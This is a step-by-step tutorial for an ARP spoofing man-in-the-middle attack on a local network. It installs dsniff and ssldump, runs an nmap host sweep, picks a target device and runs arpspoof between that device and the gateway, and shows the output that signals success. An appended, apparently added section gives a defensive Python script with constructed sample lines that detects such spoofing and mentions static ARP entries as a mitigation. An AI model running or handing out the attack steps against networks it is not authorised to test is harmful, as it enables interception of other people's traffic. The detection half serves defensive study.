1 Install the packages
Run in the terminal:
apt install dsniff ssldump
2 Scan for IP addresses on the LAN:
nmap -sn 192.168.0.*
The 192.168.0.* here may be 192.168.1.* on some networks.
Output:
Nmap scan report for 192.168.0.1
Host is up (0.00054s latency).
MAC Address: -:-:-:-:-:- (Tp-link Technologies)
# The above is the first device
Nmap scan report for 192.168.0.103
Host is up (0.11s latency).
MAC Address: -:-:-:-:-:- (Unknown)
# The second device
3 Check the network interface
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.108 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::4216:7eff:feac:e956 prefixlen 64 scopeid 0x20<link>
ether -:-:-:-:-:- txqueuelen 1000 (Ethernet)
RX packets 252997 bytes 328230065 (313.0 MiB)
RX errors 0 dropped 5 overruns 0 frame 0
TX packets 128705 bytes 13802826 (13.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 12 bytes 600 (600.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 12 bytes 600 (600.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Note the interface name eth0 (wired); it may be wlan0 (wireless) instead.
4 Start the attack
Suppose the IP of the device I want to attack is 192.168.0.103
Type in the terminal:
arpspoof -i eth0 -t 192.168.0.103 -r 192.168.0.1
# Format: arpspoof -i eth0/wlan0 -t <target IP> -r 192.168.0.1
If you see output like the following, it has succeeded
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 60:3a:7c:30:aa:3 0806 42: arp reply 192.168.0.3 is-at 40:16:7e:ac:e9:56
40:16:7e:ac:e9:56 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at 40:16:7e:ac:e9:56
Press Ctrl + C to stop the attack
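As an added example, not part of the tutorial above, the following Python script shows how a defender can recognise this attack from the network's side. It parses "arp reply <ip> is-at <mac>" lines in the same format as the output shown above and flags the three symptoms of ARP spoofing: the gateway IP being claimed by a MAC other than its known-good one, one IP advertised by several MACs, and one MAC claiming several IPs (the gateway and a host at once). The sample lines, MAC addresses and the trusted gateway mapping are constructed for this example; in practice the lines would come from a packet capture or ARP monitor on the LAN.

```python
import re
from collections import defaultdict

# Matches the "arp reply <ip> is-at <mac>" part of lines like those shown above.
# MAC octets may be unpadded (e.g. "0:0:0:0:0:0"), so allow 1-2 hex digits per octet.
ARP_REPLY_RE = re.compile(
    r"arp reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>[0-9A-Fa-f]{1,2}(?::[0-9A-Fa-f]{1,2}){5})\b"
)


def normalize_mac(mac):
    """Lower-case a MAC and zero-pad each octet so 0:0:0:0:0:0 equals 00:00:00:00:00:00."""
    return ":".join(octet.lower().zfill(2) for octet in mac.split(":"))


def parse_arp_replies(lines):
    """Return a list of (ip, mac) pairs, one for every ARP reply found in the lines."""
    pairs = []
    for line in lines:
        match = ARP_REPLY_RE.search(line)
        if match:
            pairs.append((match.group("ip"), normalize_mac(match.group("mac"))))
    return pairs


def detect_arp_spoofing(lines, trusted=None):
    """
    Return a list of alert tuples for the given capture lines.

    Alert kinds:
      ("trusted-mismatch", ip, mac)  - ip has a known-good MAC (e.g. the gateway) but another MAC claimed it
      ("ip-multiple-macs", ip, macs) - the same ip was advertised by more than one MAC
      ("mac-multiple-ips", mac, ips) - one MAC claimed more than one ip (gateway and host at once)
    """
    trusted = {ip: normalize_mac(mac) for ip, mac in (trusted or {}).items()}
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in parse_arp_replies(lines):
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)
        expected = trusted.get(ip)
        if expected is not None and mac != expected:
            alert = ("trusted-mismatch", ip, mac)
            if alert not in alerts:  # report each bad mapping once, not once per packet
                alerts.append(alert)
    for ip, macs in ip_to_macs.items():
        if len(macs) > 1:
            alerts.append(("ip-multiple-macs", ip, tuple(sorted(macs))))
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(("mac-multiple-ips", mac, tuple(sorted(ips))))
    return alerts


# Constructed sample lines in the same layout as the output above; all MACs are made up.
SAMPLE_LINES = [
    # Benign: the gateway announces its own (constructed) MAC.
    "aa:bb:cc:00:00:01 ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.0.1 is-at aa:bb:cc:00:00:01",
    # Suspicious: a different MAC claims the gateway IP ...
    "aa:bb:cc:00:00:99 0:0:0:0:0:0 0806 42: arp reply 192.168.0.1 is-at aa:bb:cc:00:00:99",
    # ... and the same MAC also claims a host IP.
    "aa:bb:cc:00:00:99 aa:bb:cc:00:00:03 0806 42: arp reply 192.168.0.103 is-at aa:bb:cc:00:00:99",
    # Noise: an IP frame, not an ARP reply, so it is ignored.
    "aa:bb:cc:00:00:03 aa:bb:cc:00:00:01 0800 98: ip 192.168.0.103 > 192.168.0.1",
]

# Constructed known-good mapping for the gateway; on a real LAN record this before any incident.
TRUSTED_MAPPINGS = {"192.168.0.1": "aa:bb:cc:00:00:01"}

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_LINES, TRUSTED_MAPPINGS):
        print(alert)
```

The trusted mapping is what makes the gateway check reliable: record the gateway's real MAC while the network is known to be clean, and treat any ARP reply that maps the gateway IP to a different MAC as an incident. Pinning that mapping as a static ARP entry on important hosts is the usual mitigation for exactly the attack this page describes.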